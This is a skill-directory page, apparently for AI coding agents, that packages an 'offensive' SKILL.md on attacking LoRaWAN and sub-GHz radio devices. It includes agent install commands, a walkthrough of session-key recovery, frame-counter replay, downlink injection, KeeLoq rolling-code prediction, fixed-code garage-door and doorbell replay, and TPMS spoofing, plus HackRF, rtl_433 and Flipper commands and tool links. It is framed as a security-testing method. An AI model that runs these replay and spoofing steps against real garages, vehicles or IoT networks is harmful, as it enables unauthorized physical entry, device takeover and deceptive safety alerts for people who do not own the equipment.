Agent SkillsSnailSploit/Claude-Red › offensive-lorawan-sub-ghz

offensive-lorawan-sub-ghz

GitHub

针对LoRaWAN及Sub-GHz频段(433/868/915MHz)的攻击技能。涵盖LoRaWAN OTAA/ABP密钥窃取、帧计数器重放、下行注入,以及KeeLoq车库门、TPMS等私有协议的信号捕获与重放。适用于IoT安全测试与无线协议分析。

Skills/wireless/offensive-lorawan-sub-ghz/SKILL.md SnailSploit/Claude-Red

Trigger Scenarios

需要攻击或测试LoRaWAN网络安全性 对Sub-GHz频段的IoT设备(如车库门、遥控器)进行信号分析与重放 使用HackRF、RTL-SDR或Flipper Zero进行无线协议逆向工程

Install

npx skills add SnailSploit/Claude-Red --skill offensive-lorawan-sub-ghz -g -y
More Options

Non-standard path

npx skills add https://github.com/SnailSploit/Claude-Red/tree/main/Skills/wireless/offensive-lorawan-sub-ghz -g -y

Use without installing

npx skills use SnailSploit/Claude-Red@offensive-lorawan-sub-ghz

指定 Agent (Claude Code)

npx skills add SnailSploit/Claude-Red --skill offensive-lorawan-sub-ghz -a claude-code -g -y

安装 repo 全部 skill

npx skills add SnailSploit/Claude-Red --all -g -y

预览 repo 内 skill

npx skills add SnailSploit/Claude-Red --list

SKILL.md

Frontmatter
{
    "name": "offensive-lorawan-sub-ghz",
    "description": "LoRaWAN and sub-GHz (433 \/ 868 \/ 915 MHz) attack methodology — LoRaWAN ABP\/OTAA join attack, network\/session key reuse, frame counter replay, downlink injection on TTN\/Helium-style networks, sub-GHz protocol replay (KeeLoq garage doors, fixed-code remotes, TPMS spoofing, smart plug telemetry), HackRF \/ RTL-SDR \/ Flipper Zero workflows, signal analysis with Inspectrum \/ Universal Radio Hacker, and reconstruction of proprietary packet formats. Use for LoRaWAN deployments (smart cities, asset tracking, industrial telemetry), or any wireless device using the unlicensed 433\/868\/915 MHz bands (garage openers, doorbells, IoT sensors, RC equipment)."
}

LoRaWAN & Sub-GHz Attacks

LoRaWAN provides long-range low-bitrate communication for IoT — common in smart cities, asset tracking, and industrial telemetry. Outside LoRaWAN, the 433 / 868 / 915 MHz ISM bands host garage doors, doorbells, smart plugs, weather stations, and TPMS — most with weak or no crypto.

Quick Workflow

  1. Identify the band + modulation (LoRa CSS vs. simple OOK/FSK)
  2. Capture transmissions with appropriate hardware (HackRF / RTL-SDR / Flipper Zero)
  3. For LoRaWAN: capture join + uplinks; analyze key derivation
  4. For proprietary sub-GHz: demodulate, identify packet format, replay or craft

Hardware

Tool Range Use
RTL-SDR RX only, 24 MHz–1.7 GHz Cheap reconnaissance
HackRF One RX/TX, 1 MHz–6 GHz Full transceiver
Flipper Zero RX/TX, sub-GHz Quick replays, fixed-code attacks
LimeSDR / BladeRF RX/TX, wider band Higher fidelity for LoRaWAN
YARD Stick One TX-focused sub-GHz Targeted replays
LoRa-specific gateway (RAK / Heltec) LoRaWAN dual-direction Standards-compliant LoRaWAN testing

LoRaWAN

LoRaWAN is a MAC layer over LoRa physical (chirp spread spectrum). Devices either:

  • OTAA (Over-the-Air Activation) — derive session keys at join
  • ABP (Activation By Personalization) — pre-flashed keys

OTAA Join Capture

# Capture LoRa packets with HackRF + Inspectrum
hackrf_transfer -r capture.iq -f 868000000 -s 1000000 -n 60000000
# Or LoRa-specific: rak_common_for_gateway

# Decode with PHY + MAC stack
git clone https://github.com/Lora-net/LoRaMac-node
# Or use ChirpStack as a sniffing gateway

The Join-Request and Join-Accept are encrypted with the device's AppKey. With AppKey (extracted from device firmware — see offensive-iot):

  • Decrypt Join-Accept → recover NwkSKey, AppSKey
  • Subsequent traffic decryption + injection

ABP — Pre-Flashed Keys

ABP devices have NwkSKey + AppSKey flashed at manufacture. Common flaws:

  • Same key across thousands of devices (vendor laziness)
  • No frame counter rollover protection → replay any historical uplink
  • DevAddr predictability (sequential allocation)
# If you have NwkSKey + AppSKey + DevAddr, decode/inject with lorawan-test-tools
git clone https://github.com/IoTsec/loraserver-attack-tools
python lora_inject.py --nwkskey <NWKS> --appskey <APPS> --devaddr <ADDR>

Frame Counter Replay

Older LoRaWAN 1.0.x doesn't enforce strict frame counter monotonicity in all stacks. Replay an uplink with a different timestamp → server processes as fresh.

Downlink Injection

If you control AppSKey + NwkSKey, you can inject downlinks (configuration changes, remote commands) to devices.

Sub-GHz Proprietary Protocols

Quick Capture + Replay (Flipper Zero / HackRF)

# RTL-SDR live monitor
rtl_433 -f 433.92M -A     # auto-decode many devices
gqrx                       # interactive spectrum analyzer

# Flipper Zero Sub-GHz menu: Read → identify modulation → capture → save
# Then replay from the saved file

# HackRF capture
hackrf_transfer -r garage.iq -f 433920000 -s 8000000 -n 80000000
# Inspectrum to visualize, identify OOK / FSK, decode bits

KeeLoq (Old Garage Doors, Some Cars)

KeeLoq uses a 32-bit block cipher with a manufacturer key. The manufacturer key was extracted publicly years ago for major brands. With it:

  • Decrypt rolling code → predict next valid code
  • Combined with capture-replay, take over the remote
# rolling-code-tools (research)
git clone https://github.com/AndrewMohawk/RollingPwn

Modern KeeLoq deployments (last 5 years) have rotated manufacturer keys, but legacy hardware (older garage doors, some industrial equipment) is in scope.

Fixed-Code Remotes

Many cheap garage openers, doorbells, and smart plugs use fixed codes — the same packet every time you press the button. Capture once, replay forever.

# Flipper Zero: Read → Save → Send (from saved file)
# Or with RFCat:
python -c "import rflib; ..."
# OR with HackRF:
hackrf_transfer -t replay.iq -f 433920000 -s 8000000

TPMS Spoofing

Tire-pressure monitoring sensors broadcast at 315/433 MHz with no authentication. Spoof low-pressure alerts:

# Capture legitimate TPMS
rtl_433 -f 315M -F json | grep TPMS

# Synthesize crafted alerts (custom modulator with HackRF)
# Useful for testing TPMS-aware vehicle systems or as denial-of-trust attack

Reconstruction of Unknown Protocols

# Universal Radio Hacker (URH) — visual reverse engineering
urh
# Load .iq capture, identify modulation visually,
# auto-detect symbols, decode bits, identify packet structure

URH walks you from raw RF to a parsed protocol description, even with no docs.

Engagement Cheatsheet

# 1. Identify band + modulation
rtl_433 -f <freq> -A           # auto-detect known protocols
gqrx                           # spectrum view to find activity

# 2. For LoRaWAN
#    - Set up gateway (or HackRF + LoRa decoding)
#    - Capture joins + uplinks
#    - Extract keys from device firmware (see offensive-iot)

# 3. For proprietary sub-GHz
#    - Capture with HackRF / RTL-SDR
#    - Visualize / decode with Inspectrum or URH
#    - Replay or craft

# 4. Document modulation, frequency, packet format, replay viability

Detection

  • LoRaWAN networks have server-side anomaly detection (frame counter, signal strength, geographic) — varies widely by operator
  • Sub-GHz consumer products typically have no monitoring
  • TPMS / industrial equipment has minimal telemetry on RF anomalies

Reporting

  • Identify exact frequency, modulation, baud, and packet format per device
  • Distinguish capture-replay vs. crafted-frame attacks
  • Note crypto state (cleartext / weak-fixed-key / standards-compliant)
  • For LoRaWAN: identify AppKey / NwkSKey / AppSKey storage in firmware

Key References

Version History

  • aeb41ec Current 2026-07-05 18:43

Same Skill Collection

Skills/auth/offensive-jwt/SKILL.md
Skills/fuzzing/offensive-fuzzing/SKILL.md
Skills/infrastructure/offensive-shellcode/SKILL.md
Skills/wireless/offensive-deauth-disassoc/SKILL.md
Skills/wireless/offensive-krack-fragattacks/SKILL.md
Skills/wireless/offensive-wpa3-sae/SKILL.md
Skills/wireless/offensive-wps/SKILL.md
Skills/wireless/offensive-z-wave/SKILL.md
Skills/active-directory/offensive-active-directory/SKILL.md
Skills/cloud/offensive-cloud/SKILL.md
Skills/exploit-dev/offensive-toctou/SKILL.md
Skills/iot/offensive-iot/SKILL.md
Skills/mobile/offensive-mobile/SKILL.md
Skills/recon/offensive-osint/SKILL.md
Skills/utility/offensive-reporting/SKILL.md
Skills/web/offensive-business-logic/SKILL.md
Skills/web/offensive-sqli/SKILL.md
Skills/wireless/offensive-bluetooth-ble/SKILL.md
Skills/wireless/offensive-bluetooth-classic/SKILL.md
Skills/wireless/offensive-evil-twin/SKILL.md
Skills/wireless/offensive-wifi-recon/SKILL.md
Skills/wireless/offensive-wifi/SKILL.md
Skills/wireless/offensive-wpa-enterprise/SKILL.md
Skills/wireless/offensive-wpa2-psk/SKILL.md
Skills/wireless/offensive-zigbee-thread-matter/SKILL.md

Metadata

Files
0
Version
aeb41ec
Hash
566cd87e
Indexed
2026-07-05 18:43

Главная - Вики-сайт
Copyright © 2011-2026 iteam. Current version is 2.155.2. UTC+08:00, 2026-07-08 21:13
浙ICP备14020137号-1 $Гость$